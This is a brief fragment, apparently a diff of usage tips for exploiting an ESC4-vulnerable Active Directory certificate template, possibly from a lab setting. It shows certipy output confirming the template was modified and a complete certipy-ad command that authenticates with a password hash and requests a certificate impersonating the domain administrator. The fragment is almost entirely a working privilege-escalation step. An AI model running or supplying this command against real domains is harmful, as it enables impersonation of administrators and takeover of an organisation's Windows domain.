Usage Tips:

 [*] Successfully updated 'DunderMifflinAuthentication'

-2. Request a Cert Based on the ESC4 Template
+2. Request a Certificate Using the Modified Template

 certipy-ad req -username '<USER>' -hashes '<HASH>' -template '<TEMPLATE>' -target <TARGET> -ca <CA> -upn administrator@<DOMAIN>